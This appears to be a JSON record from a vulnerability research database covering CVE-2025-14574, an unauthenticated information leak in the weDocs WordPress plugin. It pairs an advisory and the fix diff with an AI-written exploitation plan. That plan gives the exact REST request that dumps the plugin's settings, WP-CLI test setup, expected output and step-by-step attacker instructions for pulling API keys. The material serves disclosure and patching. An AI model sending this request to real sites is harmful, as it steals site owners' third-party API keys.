[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fJuTNVzar1OrJUNaIcSQlk4X7GV80gTTlcXHKWFXzGTE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2025-14574","wedocs-ai-powered-knowledge-base-docs-documentation-wiki-ai-chatbot-unauthenticated-sensitive-information-exposure","weDocs: AI Powered Knowledge Base, Docs, Documentation, Wiki & AI Chatbot \u003C= 2.1.15 - Unauthenticated Sensitive Information Exposure","The weDocs plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.1.15 via the `\u002Fwp-json\u002Fwp\u002Fv2\u002Fdocs\u002Fsettings` REST API endpoint. This makes it possible for unauthenticated attackers to extract sensitive data including third party services API keys.","wedocs",null,"\u003C=2.1.15","2.1.16","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-01-08 17:31:31","2026-01-09 06:34:57",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fcbca3d1e-0985-43d3-855e-eee07715f670?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fbuild\u002Findex.asset.php","assets\u002Fbuild\u002Findex.css","assets\u002Fbuild\u002Findex.js","includes\u002FAPI\u002FSettingsApi.php","includes\u002FAdmin.php","includes\u002Ffunctions.php","languages\u002Fwedocs.pot","readme.txt","researched",false,3,"# Exploitation Research Plan: CVE-2025-14574 (weDocs Sensitive Information Exposure)\n\n## 1. Vulnerability Summary\nThe **weDocs** plugin for WordPress (versions up to and including 2.1.15) contains an unauthenticated sensitive information exposure vulnerability. The plugin registers a REST API endpoint `\u002Fwp-json\u002Fwp\u002Fv2\u002Fdocs\u002Fsettings` that allows unauthenticated access to the plugin's internal settings. These settings can include sensitive third-party API keys (e.g., OpenAI, Anthropic, or Cloudflare Turnstile) used for the plugin's AI features.\n\nThe flaw exists in `includes\u002FAPI\u002FSettingsApi.php` within the `register_api` method, where the `READABLE` route for the settings base is defined with a `permission_callback` set to `__return_true`.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `GET \u002Fwp-json\u002Fwp\u002Fv2\u002Fdocs\u002Fsettings`\n- **Vulnerable Parameter:** `data` (Query String)\n- **Required Value:** `wedocs_settings`\n- **Authentication:** None (Unauthenticated)\n- **Preconditions:** The site must have settings saved in the `wedocs_settings` option (common if AI features or specific configurations are enabled).\n\n## 3. Code Flow\n1. **Route Registration:** In `includes\u002FAPI\u002FSettingsApi.php`, the `register_api()` method (lines 66-104) defines the route:\n   - Namespace\u002FVersion: `wp\u002Fv2`\n   - Base: `docs\u002Fsettings`\n   - `methods`: `WP_REST_Server::READABLE` (GET)\n   - `permission_callback`: `__return_true` (Line 73)\n2. **Callback Execution:** When a GET request is made to this route, `get_items($request)` is called (line 134).\n3. **Parameter Processing:** The function retrieves the `data` parameter: `$get_data = $request->get_param( 'data' );` (line 136).\n4. **Information Leak:** If `$get_data` equals `'wedocs_settings'`, the code executes `$value = get_option( 'wedocs_settings', array() );` and returns the entire array via `rest_ensure_response( $value )`.\n5. **Data Content:** The `wedocs_settings` option contains nested arrays, including an `ai` key which stores provider configurations and `api_key` values (as seen in the `sanitize_ai_settings` logic on line 186).\n\n## 4. Nonce Acquisition Strategy\n**No nonce is required.**\nThe REST API route is specifically registered with `'permission_callback' => '__return_true'`, which bypasses the default WordPress REST API nonce check for non-public routes. Standard WordPress REST API GET requests for public resources do not require the `_wpnonce` parameter or `X-WP-Nonce` header.\n\n## 5. Exploitation Strategy\nThe goal is to retrieve the `wedocs_settings` option and confirm the presence of sensitive API keys.\n\n### Step-by-Step Plan:\n1. **Trigger Request:** Use the `http_request` tool to perform a GET request to the vulnerable endpoint.\n2. **Target URL:** `{{BASE_URL}}\u002Fwp-json\u002Fwp\u002Fv2\u002Fdocs\u002Fsettings?data=wedocs_settings`\n3. **Payload Construction:** No body is required.\n4. **Header:** `Accept: application\u002Fjson`\n5. **Analysis:** Inspect the JSON response for the presence of the `ai` object and its `providers` list.\n\n## 6. Test Data Setup\nTo demonstrate the impact, we must first populate the settings with a \"sensitive\" key.\n1. **Requirement:** The plugin must be installed and active.\n2. **Populate Settings:** Use WP-CLI to simulate an admin configuring an OpenAI API key:\n   ```bash\n   wp option update wedocs_settings '{\"ai\":{\"default_provider\":\"openai\",\"providers\":{\"openai\":{\"api_key\":\"sk-test-vulnerable-key-12345\",\"model\":\"gpt-4\"}}}}' --format=json\n   ```\n\n## 7. Expected Results\nA successful exploit will return a `200 OK` response with a JSON body similar to:\n```json\n{\n    \"ai\": {\n        \"default_provider\": \"openai\",\n        \"providers\": {\n            \"openai\": {\n                \"api_key\": \"sk-test-vulnerable-key-12345\",\n                \"model\": \"gpt-4\"\n            }\n        }\n    }\n}\n```\n\n## 8. Verification Steps\n1. **Verify via API:** Run the exploit request using `http_request`.\n2. **Cross-Verify via CLI:** Confirm the data returned matches the database state:\n   ```bash\n   wp option get wedocs_settings --format=json\n   ```\n3. **Compare Results:** Ensure the `api_key` field in the API response matches the value set in the setup step.\n\n## 9. Alternative Approaches\n### Target Turnstile Site Key\nThe plugin also exposes a specific endpoint for the Cloudflare Turnstile site key:\n- **Endpoint:** `GET \u002Fwp-json\u002Fwp\u002Fv2\u002Fdocs\u002Fsettings\u002Fturnstile-site-key`\n- **Code Reference:** `includes\u002FAPI\u002FSettingsApi.php` line 98.\n- **Permission:** Also uses `__return_true`.\n- **Payload:** No parameters required.\n- **Significance:** While the site key is usually public, exposing it through an API endpoint allows for automated scraping of site infrastructure details.\n\n### Target Specific \"Data\" Keys\nThe `get_items` function currently only checks for `wedocs_settings`. However, researchers should check if subsequent versions or hooks (like `wedocs_settings_data`) allow for other sensitive keys to be leaked through the same logic.","The weDocs plugin for WordPress (versions up to 2.1.15) contains an unauthenticated sensitive information exposure vulnerability via its REST API. The endpoint \u002Fwp-json\u002Fwp\u002Fv2\u002Fdocs\u002Fsettings incorrectly uses __return_true as a permission callback, allowing any visitor to retrieve the plugin's full configuration, including secret API keys for AI services like OpenAI and Anthropic.","\u002F\u002F includes\u002FAPI\u002FSettingsApi.php:66\npublic function register_api() {\n    register_rest_route( $this->namespace . $this->version, '\u002F' . $this->base,\n        array(\n            array(\n                'methods'             => WP_REST_Server::READABLE,\n                'callback'            => array( $this, 'get_items' ),\n                'permission_callback' => '__return_true',\n            ),\n\n---\n\n\u002F\u002F includes\u002FAPI\u002FSettingsApi.php:134\npublic function get_items( $request ) {\n    $value    = array();\n    $get_data = $request->get_param( 'data' );\n\n    if ( 'wedocs_settings' === $get_data ) {\n        $value = get_option( 'wedocs_settings', array() );\n    }\n\n    return rest_ensure_response( $value );\n}\n\n---\n\n\u002F\u002F includes\u002FAPI\u002FSettingsApi.php:98\nregister_rest_route( $this->namespace . $this->version, '\u002F' . $this->base . '\u002Fturnstile-site-key',\n    array(\n        array(\n            'methods'             => WP_REST_Server::READABLE,\n            'callback'            => array( $this, 'get_turnstile_site_key' ),\n            'permission_callback' => '__return_true',\n        ),\n    )\n);","--- includes\u002FAPI\u002FSettingsApi.php\n+++ includes\u002FAPI\u002FSettingsApi.php\n@@ -70,7 +70,11 @@\n             array(\n                 array(\n                     'methods'             => WP_REST_Server::READABLE,\n                     'callback'            => array( $this, 'get_items' ),\n-                    'permission_callback' => '__return_true',\n+                    'permission_callback' => function () {\n+                        return current_user_can( 'manage_options' );\n+                    },\n                 ),\n                 array(\n                     'methods'             => WP_REST_Server::CREATABLE,\n@@ -101,7 +101,9 @@\n         register_rest_route( $this->namespace . $this->version, '\u002F' . $this->base . '\u002Fturnstile-site-key',\n             array(\n                 array(\n                     'methods'             => WP_REST_Server::READABLE,\n                     'callback'            => array( $this, 'get_turnstile_site_key' ),\n-                    'permission_callback' => '__return_true',\n+                    'permission_callback' => function () {\n+                        return current_user_can( 'manage_options' );\n+                    },\n                 ),\n             )\n         );","The exploit targets the weDocs REST API settings endpoint which lacks proper authorization checks. An unauthenticated attacker can retrieve sensitive information by following these steps:\n1. Identify a WordPress site running weDocs version 2.1.15 or earlier.\n2. Send a GET request to the endpoint: `\u002Fwp-json\u002Fwp\u002Fv2\u002Fdocs\u002Fsettings?data=wedocs_settings`.\n3. No authentication headers or nonces are required because the 'permission_callback' is hardcoded to return true.\n4. The server will respond with a 200 OK and a JSON body containing the 'wedocs_settings' database option.\n5. The attacker can then parse the 'ai' key within the response to find cleartext API keys for providers like OpenAI, Anthropic, or Cloudflare.","gemini-3-flash-preview","2026-05-05 14:04:06","2026-05-05 14:04:22",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","2.1.15","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwedocs\u002Ftags\u002F2.1.15","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwedocs.2.1.15.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwedocs\u002Ftags\u002F2.1.16","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwedocs.2.1.16.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwedocs\u002Ftags"]